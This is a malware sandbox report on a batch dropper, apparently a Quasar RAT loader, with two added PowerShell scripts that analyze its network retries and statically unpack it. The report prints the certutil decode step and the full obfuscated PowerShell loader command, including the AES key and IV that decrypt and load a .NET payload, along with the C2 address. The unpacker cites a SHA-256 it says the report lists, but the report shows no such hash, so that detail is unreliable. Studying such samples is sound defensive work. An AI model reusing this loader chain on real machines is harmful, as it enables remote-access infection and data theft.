                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................G.......G.............................................+...........Rich............................PE..d....)............"..........P...... 2.........@..........................................`.......... ......................................|@.......p...}...`..................0...P...T.......................(....................................................text.............................. ..`.rdata..............................@..@.data...8....P.......<..............@....pdata.......`.......B..............@..@.rsrc....}...p...~...L..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\certutil.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):100
                            Entropy (8bit):4.859079570624175
                            Encrypted:false
                            SSDEEP:3:qOYFXXmxNVEM+YFUiWUSRwqRF8jxd1ELzdUA2AGN8cv:q3lUdnuiW9gxILxUANGN8e
                            MD5:FA1FF6A8138C97A5B875A45881B15AC1
                            SHA1:09BC1EE3F39C5A4B2DD9CB8B5AC853E0E277FECE
                            SHA-256:C3BE4668A60432076884B0ECC8941E2C9F016813ABEBFB9BE0ADDC3376C60E96
                            SHA-512:415A63EFB1E304DBF1D6B5035AB6024C7932051EF7638BE75A4AD0E9163A4959703C0F3A4AAA019F7C2531BA4F1A17FDCBE7FAE13FDB1131D3B99D289853D975
                            Malicious:false
                            Preview:Input Length = 2277691..Output Length = 1656310..CertUtil: -decode command completed successfully...
File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators (libmagic keys on a leading UTF-16 byte-order mark; the odd file size of 2277691 bytes and the plain-ASCII batch commands in the content preview show the body is single-byte text, which is also why cmd.exe could execute it and why the TrID guesses below are meaningless)
                            Entropy (8bit):5.697442564532801
                            TrID:
                            • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                            • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                            • MP3 audio (1001/1) 18.19%
                            File name:deneme.bat
                            File size:2277691
                            MD5:140518164b4e215675accd37cae0d91f
                            SHA1:605f1798f9b54b245e35ea516c6e3818463953a7
                            SHA256:3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
                            SHA512:a0210e5147d4e1cda815d4cab29a82f1dd221fd43456d4d9a18ebe1761c90aa31d48f7aca111510dedb2001ef125fb8226634aa3db7fcbfca57a7d5f389a8052
                            SSDEEP:24576:dr8+hKEEFki/cKQSMavHgz6kMtQCJQ5HT0/xBBX0T+DewGEpwERNey20cUIz9Chg:dryEE7kMRy+DeOFYT0hTg+js
                            TLSH:1CB5022541983FE9CB58673CF079320E57F4158B4A65628EAB63EE06BFF6C080D274B5
                            File Content Preview:..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\allah.bat" >nul 2>&1 ..cls.."%Temp%\allah.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpzZXQgI
                            Icon Hash:9686878b929a9886
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 28, 2023 09:35:08.256187916 CEST | 49702 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:35:11.263130903 CEST | 49702 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:35:17.263669014 CEST | 49702 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:35:32.719080925 CEST | 49703 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:35:35.718307972 CEST | 49703 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:35:41.722459078 CEST | 49703 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:35:57.330818892 CEST | 49704 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:00.345535040 CEST | 49704 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:06.361524105 CEST | 49704 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:21.668445110 CEST | 49705 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:24.683211088 CEST | 49705 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:30.683803082 CEST | 49705 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:46.357554913 CEST | 49706 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:49.372786045 CEST | 49706 | 3131 | 192.168.2.3 | 74.234.104.236
May 28, 2023 09:36:55.389588118 CEST | 49706 | 3131 | 192.168.2.3 | 74.234.104.236

Reading the table: every source port carries exactly three packets, 3 s and then 6 s apart, which is the Windows default SYN retransmission schedule for a peer that never answers. The C2 at 74.234.104.236:3131 was therefore unreachable during the run, and the fresh source port roughly every 24.5 s is the client's reconnect loop; no payload was exchanged in this capture.

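As an added example, not part of the report, the following PowerShell script applies that SYN-retransmission test to connection rows like the ones above. The input is constructed: the report's fifteen rows are copied into a simplified timestamp format, and one extra pair of rows for port 49707 is invented as a control to show what an answered connection looks like. Nothing here is the sandbox's or the sample's code.

```powershell
# Added example (not from the report). Splits a per-packet connection log into
# connection attempts and flags the ones that show Windows' unanswered-SYN
# pattern (3 packets, gaps of 3 s and 6 s), then derives the reconnect cadence.
# Rows: "<date> <time> <sport> <dport> <sip> <dip>". The first 15 are this
# report's table in simplified form; the 49707 pair is a constructed control.
$rows = @'
2023-05-28 09:35:08.256 49702 3131 192.168.2.3 74.234.104.236
2023-05-28 09:35:11.263 49702 3131 192.168.2.3 74.234.104.236
2023-05-28 09:35:17.263 49702 3131 192.168.2.3 74.234.104.236
2023-05-28 09:35:32.719 49703 3131 192.168.2.3 74.234.104.236
2023-05-28 09:35:35.718 49703 3131 192.168.2.3 74.234.104.236
2023-05-28 09:35:41.722 49703 3131 192.168.2.3 74.234.104.236
2023-05-28 09:35:57.330 49704 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:00.345 49704 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:06.361 49704 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:21.668 49705 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:24.683 49705 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:30.683 49705 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:46.357 49706 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:49.372 49706 3131 192.168.2.3 74.234.104.236
2023-05-28 09:36:55.389 49706 3131 192.168.2.3 74.234.104.236
2023-05-28 09:37:10.000 49707 3131 192.168.2.3 74.234.104.236
2023-05-28 09:37:10.050 49707 3131 192.168.2.3 74.234.104.236
'@ -split "`n" | Where-Object { $_.Trim() }

$pkts = foreach ($r in $rows) {
    $f = $r.Trim() -split '\s+'
    [pscustomobject]@{
        Time  = [datetime]::ParseExact("$($f[0]) $($f[1])", 'yyyy-MM-dd HH:mm:ss.fff', [cultureinfo]::InvariantCulture)
        SPort = [int]$f[2]; DPort = [int]$f[3]; Src = $f[4]; Dst = $f[5]
    }
}

function Get-ConnectionAttempts {
    param([object[]]$Packets)
    # One source port = one connect() call. Windows resends an unanswered SYN
    # after 3 s and again after a further 6 s, then gives up, so exactly three
    # packets with those gaps and nothing else means the handshake never completed.
    $Packets | Group-Object SPort | ForEach-Object {
        $p = @($_.Group | Sort-Object Time)
        $gaps = @(for ($i = 1; $i -lt $p.Count; $i++) {
            [math]::Round(($p[$i].Time - $p[$i - 1].Time).TotalSeconds) })
        [pscustomobject]@{
            SPort      = [int]$_.Name
            First      = $p[0].Time
            Packets    = $p.Count
            Gaps       = ($gaps -join ',')
            Unanswered = ($p.Count -eq 3 -and $gaps[0] -eq 3 -and $gaps[1] -eq 6)
            Dst        = "$($p[0].Dst):$($p[0].DPort)"
        }
    } | Sort-Object First
}

$attempts = Get-ConnectionAttempts -Packets $pkts
$attempts | Format-Table -AutoSize

# Time between successive failed attempts = the implant's reconnect delay plus
# the ~21 s Windows spends on the three SYNs.
$unanswered = @($attempts | Where-Object Unanswered)
$cadence = @(for ($i = 1; $i -lt $unanswered.Count; $i++) {
    ($unanswered[$i].First - $unanswered[$i - 1].First).TotalSeconds })
"{0} of {1} attempts to {2} never completed the handshake; new attempt every ~{3:N1} s" -f `
    $unanswered.Count, $attempts.Count, $unanswered[0].Dst, ($cadence | Measure-Object -Average).Average
```

On this input the five report ports come out as Unanswered, the constructed 49707 pair does not, and the cadence is about 24.5 s. On a real capture, feed it the per-packet rows of one host and look for the same shape against any port; the non-standard port is what the sandbox flagged, but the retry rhythm is the stronger tell.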

                            Target ID:0
                            Start time:09:34:49
                            Start date:28/05/2023
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
                            Imagebase:0x7ff707bb0000
                            File size:273920 bytes
                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:1
                            Start time:09:34:50
                            Start date:28/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:2
                            Start time:09:34:50
                            Start date:28/05/2023
                            Path:C:\Windows\System32\mode.com
                            Wow64 process (32bit):false
                            Commandline:Mode 60,3
                            Imagebase:0x7ff6c3520000
                            File size:31232 bytes
                            MD5 hash:1A3D2D975EB4A5AF22768F1E23C9A83C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:3
                            Start time:09:34:50
                            Start date:28/05/2023
                            Path:C:\Windows\System32\certutil.exe
                            Wow64 process (32bit):false
                            Commandline:CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
                            Imagebase:0x7ff70d710000
                            File size:1557504 bytes
                            MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:4
                            Start time:09:34:52
                            Start date:28/05/2023
                            Path:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            Wow64 process (32bit):false
                            Commandline:"allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
                            Imagebase:0x7ff7eb5b0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifacts observed in infostealers, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekshen
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:high
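
The two unpacking steps this report documents, the certutil trick in the file content preview of deneme.bat and the AES-CBC plus GZip loader in the command line of Target ID 4, can be reproduced statically. The following PowerShell script is an added example, not code from the report, the sandbox or the sample's author. It assumes the non-printable bytes at the start of deneme.bat are a UTF-16 byte-order mark in front of single-byte text (the odd byte count supports this), that the stage-1 batch contains the ':: <base64>' carrier line the loader searches for, and that the key and IV hard-coded in the sandboxed command line belong to this sample; the output file names are arbitrary. Unlike the loader it writes the decrypted assembly to disk instead of calling Assembly.Load on it.

```powershell
# Added example, not code from the report or from the sample's author: a static
# unpacker for the two stages this report documents. Stage 1 mirrors what
# "CERTUTIL -f -decode deneme.bat %Temp%\allah.bat" did; stage 2 mirrors the
# AES-CBC/PKCS7 + GZip unwrapping in the allah.bat.exe command line, but writes
# the resulting .NET assembly to disk instead of loading it.
# Run it on an isolated analysis host; both outputs are detected by AV.
param(
    [Parameter(Mandatory)][string]$InputBat,               # path to deneme.bat
    [string]$OutDir = (Join-Path $PWD 'unpacked'),          # output names are arbitrary
    # SHA-256 the report lists for the batch certutil dropped; used as a self-check.
    [string]$ExpectedStage1Sha256 = '5642778FEF03F7E81A81BB97A3C33D0B569479C65B556EB1CDAE50108BBC8A14'
)
$ErrorActionPreference = 'Stop'
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# Both batch files are single-byte text; deneme.bat merely starts with a UTF-16
# BOM (assumption: that BOM is what the report's "UTF-16" file type comes from).
# Decoding as ISO-8859-1 maps every byte to one char, so a BOM-sniffing reader
# cannot turn the body into garbage and no byte can break the regex.
$latin1 = [System.Text.Encoding]::GetEncoding(28591)

function ConvertFrom-CertutilBlob {
    param([string]$Path)
    $text = $latin1.GetString([System.IO.File]::ReadAllBytes($Path))
    # certutil -decode ignores the PEM header and line breaks; do the same and
    # stop at the first character outside the base64 alphabet.
    $m = [regex]::Match($text, '-----BEGIN CERTIFICATE-----(?<b64>[A-Za-z0-9+/=\r\n ]+)')
    if (-not $m.Success) { throw "no BEGIN CERTIFICATE block in $Path" }
    return [Convert]::FromBase64String(($m.Groups['b64'].Value -replace '\s', ''))
}

function ConvertFrom-AesGzipCarrier {
    param([byte[]]$BatchBytes, [string]$KeyB64, [string]$IvB64)
    # The payload rides in a ':: <base64>' line, which cmd.exe treats as a comment.
    $line = ($latin1.GetString($BatchBytes) -split "`r?`n") |
        Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $line) { throw 'no ":: <base64>" carrier line found' }
    $cipher = [Convert]::FromBase64String($line.Substring(3))

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($KeyB64)
    $aes.IV  = [Convert]::FromBase64String($IvB64)
    $dec = $aes.CreateDecryptor()
    # Wrong key or IV surfaces here as a padding error rather than silent garbage.
    try { $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }

    $in  = New-Object System.IO.MemoryStream(, $plain)
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    return $out.ToArray()
}

# Stage 1: the batch that certutil wrote to %Temp%\allah.bat in the sandbox.
$stage1 = ConvertFrom-CertutilBlob -Path $InputBat
$stage1Path = Join-Path $OutDir 'stage1.bat'
[System.IO.File]::WriteAllBytes($stage1Path, $stage1)
$stage1Hash = (Get-FileHash -Algorithm SHA256 -Path $stage1Path).Hash
if ($stage1Hash -ne $ExpectedStage1Sha256) {
    Write-Warning "stage1 SHA-256 $stage1Hash differs from the report's dropped file"
}
"stage1: {0} bytes, SHA256 {1} -> {2}" -f $stage1.Length, $stage1Hash, $stage1Path

# Stage 2: key and IV are the ones hard-coded in the sandboxed command line.
$stage2 = ConvertFrom-AesGzipCarrier -BatchBytes $stage1 `
    -KeyB64 '6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=' `
    -IvB64  'lxQsLBFdvl0gyeVxt5ivJg=='
# A .NET assembly is a PE image: refuse anything that does not start with 'MZ'.
if ($stage2.Length -lt 2 -or $stage2[0] -ne 0x4D -or $stage2[1] -ne 0x5A) {
    throw 'decrypted blob is not a PE image; carrier line, key or IV do not match this variant'
}
$stage2Path = Join-Path $OutDir 'stage2.bin'
[System.IO.File]::WriteAllBytes($stage2Path, $stage2)
"stage2: {0} bytes, SHA256 {1} -> {2}" -f $stage2.Length, (Get-FileHash -Algorithm SHA256 -Path $stage2Path).Hash, $stage2Path
```

Usage: `.\unpack.ps1 -InputBat .\deneme.bat`. A quick manual check before running anything is that the first base64 characters in the content preview, QGVjaG8gb2Zm, decode to "@echo off", which matches the start of the certutil-dropped batch shown above; the script's SHA-256 comparison does the same check for the whole file. The key and IV are per-sample, so for another build of this loader lift them from its own `-command` string the same way.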

                            No disassembly